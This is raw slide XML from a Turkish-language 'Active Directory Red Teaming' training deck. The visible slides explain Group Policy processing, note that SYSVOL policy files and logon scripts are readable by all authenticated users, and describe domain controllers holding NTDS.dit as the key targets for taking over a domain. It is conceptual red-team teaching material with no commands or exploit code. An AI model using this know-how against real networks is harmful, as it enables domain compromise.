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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId96"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258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2" r:id="rId35"/>
    <p:sldId id="290" r:id="rId36"/>
    <p:sldId id="291" r:id="rId37"/>
    <p:sldId id="303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4" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="347" r:id="rId51"/>
    <p:sldId id="348" r:id="rId52"/>
    <p:sldId id="349" r:id="rId53"/>
    <p:sldId id="350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41" r:id="rId74"/>
    <p:sldId id="342" r:id="rId75"/>
    <p:sldId id="343" r:id="rId76"/>
    <p:sldId id="344" r:id="rId77"/>
    <p:sldId id="345" r:id="rId78"/>
    <p:sldId id="346" r:id="rId79"/>
    <p:sldId id="334" r:id="rId80"/>
    <p:sldId id="335" r:id="rId81"/>
    <p:sldId id="336" r:id="rId82"/>
    <p:sldId id="338" r:id="rId83"/>
    <p:sldId id="339" r:id="rId84"/>
    <p:sldId id="340" r:id="rId85"/>
    <p:sldId id="337" r:id="rId86"/>
    <p:sldId id="325" r:id="rId87"/>
    <p:sldId id="326" r:id="rId88"/>
    <p:sldId id="327" r:id="rId89"/>
    <p:sldId id="328" r:id="rId90"/>
    <p:sldId id="330" r:id="rId91"/>
    <p:sldId id="331" r:id="rId92"/>
    <p:sldId id="332" r:id="rId93"/>
    <p:sldId id="333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3" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="68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85C9A37-EFBD-EF8D-F363-F4E366FA52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Seccops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508A47-6679-6D17-8843-EDB91B041A7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61BB1F-040D-4907-81D2-DA58F632E121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15CECC-71A8-5E3E-CC61-09A47BA575D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Seccops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4995F4-A0C5-A583-F5EC-300787F443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9EFE39-3343-4ADF-8BCD-DD166ECF2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902372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Seccops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83BDD6-D2F8-4F8A-84D5-8B6FFD50E2FD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Seccops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CAF965-5FFB-4D8B-BD45-42F0A3FB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954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6A13F-7A1B-552F-BE0E-C3032ACC9E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6D1EBD-70F4-616C-B406-527A8B61ED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873EC-A861-9913-43F6-7992581B2A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31CD34-F813-47E6-A3EE-B84676E97524}" type="datetime1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EC5AC-D386-0E09-6BC2-5FE14DE30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F0EAF-F4F6-CAC9-7249-DCC46AAC1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AB1045-5214-407A-A162-66699A2EB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910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74F8C-0FB3-EB5E-72D0-7371A22DE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ED9E14-19A0-3813-DC00-63DAACBF30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8EBC5-2C82-9C84-9675-BF5D0BF1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589D90-1544-4CAB-A6AE-75253062DD4E}" type="datetime1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7B227-2E35-86F6-FD9A-DC02DFC5B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A11B4-EDBB-E841-4836-358E599BF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AB1045-5214-407A-A162-66699A2EB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231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9A3003-7E17-D1EB-8CCA-30E1A75433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69AB4C-E0D6-592B-5D9E-4EC7A8478A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7F450-3BE7-FD8D-2427-2EA368D5C0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5930436-A604-4055-A3FE-B08C2369DF30}" type="datetime1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310F7-20E5-A941-1DC1-798090DCA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4C44F-4F93-8C98-25BD-B2C949990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AB1045-5214-407A-A162-66699A2EB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91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94D3E-939F-16AE-BD84-53254ECB7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E0F9E-2701-3252-8493-F3F44E7CC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021C5-0F40-5317-C7B7-914739192D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1B679F-40EE-4091-B7B9-5F8F4CC05EB9}" type="datetime1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E51CE-30E5-6E36-4701-87B1DD25A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C257B-19C2-FCA7-4F30-C0346C016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AB1045-5214-407A-A162-66699A2EB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21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9B40-79C0-B34A-679A-F9F381C23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D45BC-86DE-8424-7CA1-EBFDA11A6C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FB99E-642E-BC7E-2D82-572261D174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58AB60-FA2F-4CD1-8B2E-2A34DB8209E1}" type="datetime1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2D91C-743A-0D68-A669-6DEE3E7D2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C359B-DCEC-741D-0F63-1E45F5FDB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AB1045-5214-407A-A162-66699A2EB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56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D173F-015F-7F86-82A6-A455112EA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E4E1C-B5DD-61EB-8B55-FACB87ABD3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350E9-1710-ED4F-755B-78A25E6B1B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7AB9F7-31F3-7A5C-0616-AE82374F50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D3E6A4-D8BC-4681-A76B-F89989F5A451}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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8A9DA-A04C-D2D7-AD75-ABBA6EA84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4A5CDB-A266-9CFB-F770-7749C3A55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AB1045-5214-407A-A162-66699A2EB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740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28605-A75C-0AA2-CCD6-27FCC4673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51FA44-4AE7-A74F-F0A7-0EBC7CDD8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46A200-ADA3-3210-954B-87D29EA3CA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6B331C-B58D-A605-B47B-D9830DA019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5D47CE-20A8-09AE-1398-33B68E32E9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521438-710E-3583-9D05-A53D73868D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F48BF70-696E-4F8F-B752-8F46B61BADCC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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04B579-29BC-D573-CA46-BBFD8ED91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D9D498-EBAE-7FF7-3A06-89C1C75A7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AB1045-5214-407A-A162-66699A2EB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940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A8F84-F357-4642-56EF-06C103684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F13CFA-7164-C3AA-E97B-8C985799AC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D067A6-2D26-4E78-B82B-7C4B0E29CDF9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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F88873-F8E4-33B0-1FD2-F192B9966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97CB7E-853C-A162-3387-C9F0379C0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AB1045-5214-407A-A162-66699A2EB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3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7411AA-FEB6-C418-D8B9-9CD16F048E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C5C9C4-BCF4-4DFA-918F-B3DE41EE78B0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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D55CCB-A4A0-6A4A-C9E3-3F9ED3326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EE382-38A7-ABA7-6F8D-F47C1D7FF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AB1045-5214-407A-A162-66699A2EB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55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478F9-4FBA-58FD-9ECA-654AD34F9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CCC51-2D05-0651-E5E0-97E713F3F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648DE5-AD28-56A9-A341-FF993D308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C81084-7F73-D007-98D7-D530926338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F686C1-5BA4-4327-A824-9FBDF063198B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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FE8571-4F6E-E2D9-5A7D-FBAAA506D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61FDCC-2947-F2CA-3143-D52144F3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AB1045-5214-407A-A162-66699A2EB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925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7C060-C38A-FEA7-A8B4-F0B73BEC5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D84B8D-4D0B-017A-33FB-7BC9266C1F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18BC59-060B-68EF-3C77-FE83062A9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08579C-E0A7-955D-73D0-6E7262DD3C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04C5FB-39F2-443F-BF86-B2DBE5B4C12C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/23/2025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1D0D8-72DE-A66B-FA02-EC08231F9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A869F1-3277-EF78-2C17-F95FA3932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AB1045-5214-407A-A162-66699A2EB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250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B9F7C4-210F-3A62-90F2-703CCD09A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FCC872-40A5-164E-A573-535B7FF98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DAD3C-B8B1-18A1-AEC1-F5C70882E8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icture 9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45F6B0BD-76C9-0ED7-B45E-EC37247C889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776" y="6311900"/>
            <a:ext cx="2046448" cy="44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7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89570-31DB-A627-C88A-14F7FB9FE9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Active Directory Red Teaming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E42B35-D111-610C-E7B7-AC97B5630E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Nadir Şensoy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605239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17E27-21C4-5632-BC28-5D5765F7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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GPO’ların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>İşlenmesi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F88F5-AA61-E56B-46F8-4D0FA12AB8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r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Domain, Organizational Unit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en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kendilerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uygulanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>gerekli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>koşullara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>barındırdıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iletirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>BlockInheritance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Enforcement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Precedence </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>L(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)S(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)D(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>omain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)OU </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nihai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>bilgisayarlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>kullanıcılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etkilidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. 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Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>analizleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>süreç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>göz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>önüne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>alınarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gerçekleştirilmelidir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3546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128F1-2251-5EF2-E4C6-9D5583361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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Group Policy Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dosyaları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A9E17-C1F5-F0B4-6FDA-D2A4C089C2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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Objelerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dosyalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>çoğunlukla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dosyası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>şeklinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>\\\SYSVOL\\Policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dizini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>altında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tutulmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dosyalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanıcıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Authenticated Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>okunabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Logon/Logoff, Startup/Shutdown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>scriptleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> SYSVOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dizininde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tutulmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>scriptler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanıcılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>okunabilmektedir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2731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7F65C-72EA-0B4B-66E7-12C63191F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 err="1"/>
              <a:t>Yetkili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Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Objeler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C19BA-CF0A-75D6-B999-6D718B0D26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sz="1800" b="1"/>
              <a:t>Domain Controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ortamının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>yönetimini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sağlayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>merkezi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>veritabanını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>barındıran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sunuculardır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>çalıştırılabilirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sunucunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>geçirilebilirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ortamı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
